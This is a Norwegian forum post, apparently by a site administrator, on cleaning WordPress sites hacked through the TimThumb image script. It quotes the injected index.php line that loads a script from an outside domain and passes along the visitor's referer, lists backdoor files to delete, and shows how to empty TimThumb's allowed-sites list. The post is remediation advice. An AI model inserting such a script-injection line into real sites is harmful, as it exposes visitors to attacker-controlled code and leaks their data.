timthumb hacking - phpRemoteView

Tonny Kluften

Administrator
Ser ut til at noen WP sider er hacket med noe som kalles phpRemoteView hack.

Slik ordner du det:

Åpne index.php og fjerne koden:

Kode:
echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

Ikke fjern ?> på slutten av koden!

Finn føgende filer og slett dem:

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php

De filene er lagt til av hackerne og er en del av phpRemoteView hack.

Oppdater Timthumb.php hvorhen du nå har den (hvis du har den). timthumb - image crop zoom resize management - Google Project Hosting
 

Tonny Kluften

Administrator
Kan jo legge til at det er veldig viktig å fikse dette sikkerhetshullet. Så har du et tema som du tror bruker timthumb.php så gjør noe med det.

Og fiksen er enkel og kommer her:

Gå til wp-admin --> utseende --> redigering
Åpne filen timthumb.php

Bytt ut dette:

// external domains that are allowed to be displayed on your website
$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
);

Med dette:

// external domains that are allowed to be displayed on your website
$allowedSites = array();

Zero Day Vulnerability in many Wordpress Themes | mm
 
Sist redigert:
Topp